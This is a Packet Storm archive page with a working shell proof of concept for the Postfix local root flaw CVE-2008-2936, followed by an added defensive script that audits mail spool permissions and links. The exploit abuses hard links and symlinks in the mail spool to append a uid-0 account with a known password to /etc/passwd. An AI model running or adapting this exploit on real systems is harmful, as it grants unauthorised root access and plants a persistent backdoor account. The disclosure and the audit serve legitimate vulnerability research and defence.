
rs_pocfix.txt

Published 31 Aug 2008 00:00:00. Reported by Roman Medina-Heigl Hernandez aka RoMaNSoFt.
Type: packetstorm
Source: packetstormsecurity.com

PoC for Postfix local root vulnerability: CVE-2008-2936 by Roman Medina-Heigl Hernandez

Code
```sh
#!/bin/sh
#
# "rs_pocfix.sh" (PoC for Postfix local root vulnerability: CVE-2008-2936)
# by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt <[email protected]>
#
# Tested: Ubuntu / Debian
#
# [ Madrid, 30.Aug.2008 ]
#

# Config

writable_dir=/tmp
spool_dir=/var/mail # Use "postconf mail_spool_directory" to obtain this
user=root
target=/etc/passwd
useful_link=/usr/bin/atq # lrwxrwxrwx 2 root root 2 2007-05-04 22:15 /usr/bin/atq -> at
useful_link_dst=at # Tip: find / -type l -uid 0 -print -exec ls -l {} \; | less
seconds=3
user_in_passwd="dsr:3GsXLdEaKaGnM:0:0:root:/root:/bin/sh" # Pass is "dsrrocks"
postfix=`which postfix` # /usr/sbin/postfix
postconf=/usr/sbin/postconf
postmap=/usr/sbin/postmap


# Funcs

quit()
{
    echo "$1"
    exit
}


# Step 1: is my system vulnerable?

head -n 9 $0 | tail -n 8
if [ $postfix ] ; then
    echo "[*] Postfix seems to be installed"
else
    quit "[!] Are you sure Postfix is installed?"
fi

mkdir -p $writable_dir/pocfix
touch $writable_dir/pocfix/src
ln -s $writable_dir/pocfix/src $writable_dir/pocfix/dst1
ln $writable_dir/pocfix/dst1 $writable_dir/pocfix/dst2

if [ -L $writable_dir/pocfix/dst2 ] ; then
    echo "[*] Hardlink to symlink not dereferenced"
    rm -rf $writable_dir/pocfix
else
    rm -rf $writable_dir/pocfix
    quit "[!] Hardlink to symlink correctly dereferenced. System is not vulnerable"
fi

if [ -d $spool_dir -a -w $spool_dir ] ; then
    echo "[*] Spool dir is writable"
else
    quit "[!] Spool dir is not writable"
fi

if [ -e $spool_dir/$user ] ; then
    rm -f $spool_dir/$user
    echo "[*] Mailbox for \"$user\" found. Trying to delete it"

    if [ -e $spool_dir/$user ] ; then
        quit "[!] Couldn't delete it"
    else
        echo "[*] Deletion ok"
    fi

fi

if [ -e $spool_dir/$useful_link_dst ] ; then
    rm -f $spool_dir/$useful_link_dst
    echo "[*] Mailbox for \"$useful_link_dst\" found. Trying to delete it"

    if [ -e $spool_dir/$useful_link_dst ] ; then
        quit "[!] Couldn't delete it"
    else
        echo "[*] Deletion ok"
    fi

fi

aliases=`$postconf alias_database | cut -d"=" -f2`
$postconf alias_maps | grep -q $aliases
if [ $? -eq 0 ] ; then
    if [ $aliases ] ; then
        $postmap -q $user $aliases > /dev/null
        if [ $? -eq 0 ] ; then
            quit "[!] Mail alias for \"$user\" exists"
        fi
    fi
fi

lda=`$postconf mailbox_command | cut -d"=" -f2`
if [ $lda ] ; then
    quit "[!] Non-Postfix LDA detected"
fi

$postconf home_mailbox | grep -q '/$'
if [ $? -eq 0 ] ; then
    quit "[!] Maildir-style mailbox detected"
fi


# Step 2: Exploiting

ln -f $useful_link $spool_dir/$user 2> /dev/null || quit "[!] Couldn't create hardlink (different partitions?)"
ln -s -f $target $spool_dir/$useful_link_dst 2> /dev/null || quit "[!] Couldn't create symlink pointing to target file"
cp -f $target $writable_dir/pocfix_target_backup.$$ && echo "[*] Backed up: $target (saved as \"$writable_dir/pocfix_target_backup.$$\")"
echo "[*] Sending mail ($seconds seconds wait)"
echo $user_in_passwd | /usr/sbin/sendmail $user

sleep $seconds

diff -q $target $writable_dir/pocfix_target_backup.$$ > /dev/null

if [ $? -eq 0 ] ; then
    echo "[!] Exploit failed"
else
    echo "[*] Exploit successful (appended data to $target). Now \"su dsr\", pass is \"dsrrocks\")"
fi

rm -f $spool_dir/$user
rm -f $spool_dir/$useful_link_dst
```
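The PoC's Step 1 spells out the spool conditions it depends on: a spool directory the local user can write to, and mailbox entries that can be replaced by a hard link to a root-owned binary and a symlink to the target file. The following audit, added here as an example and not part of the original PoC or its author's code, checks a mail spool for exactly those conditions from the defender's side (an "other"-writable spool, mailbox entries that are symlinks, carry extra hard links, or are owned by someone other than the user they are named after). The sample spool it builds in a temp directory is constructed; on a real host pass the output of `postconf -h mail_spool_directory` instead.

```sh
#!/bin/sh
# Added defensive audit, not part of the original PoC. It looks for the spool
# conditions the PoC depends on: an "other"-writable spool directory and
# mailbox entries that are symlinks, carry extra hard links, or are not owned
# by the user they are named after. Sample data below is constructed.

audit_spool() {
    dir="$1"
    [ -d "$dir" ] || { echo "ERROR: $dir is not a directory"; return 2; }
    count=0
    # ls mode string: character 9 is the "other write" bit (e.g. drwxrwxrwt)
    mode=$(ls -ld "$dir" | cut -c1-10)
    case "$mode" in
        ????????w?) echo "WARN: $dir is writable by other ($mode)"; count=$((count + 1)) ;;
    esac
    for f in "$dir"/*; do
        [ -e "$f" ] || [ -L "$f" ] || continue    # empty dir leaves the glob unexpanded
        name=${f##*/}
        if [ -L "$f" ]; then
            echo "WARN: $f is a symlink -> $(readlink "$f")"
            count=$((count + 1))
            continue
        fi
        set -- $(ls -ld "$f")                     # $2 = link count, $3 = owner
        if [ "$2" -gt 1 ]; then
            echo "WARN: $f has $2 hard links"; count=$((count + 1))
        fi
        if [ "$3" != "$name" ]; then
            echo "WARN: $f is owned by $3, expected $name"; count=$((count + 1))
        fi
    done
    [ "$count" -eq 0 ]    # exit status 0 only when nothing was flagged
}

# Build a constructed spool in a temp dir that reproduces all three conditions.
make_sample_spool() {
    root=$(mktemp -d)
    mkdir "$root/spool" && chmod 1777 "$root/spool"   # world-writable spool
    : > "$root/atq"; : > "$root/passwd"               # stand-ins for a binary and the target
    set -- $(ls -ld "$root/atq")                      # $3 = our own user name
    ln "$root/atq" "$root/spool/$3"                   # mailbox that is a hard link to a binary
    ln -s "$root/passwd" "$root/spool/at"             # mailbox that is a symlink to the target
    echo "$root"
}

sample=$(make_sample_spool)
audit_spool "$sample/spool" || echo "[!] sample spool flagged, as expected"
rm -rf "$sample"
```

Run it periodically (or from a file-integrity job) against the real spool; a clean spool produces no output and exit status 0.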
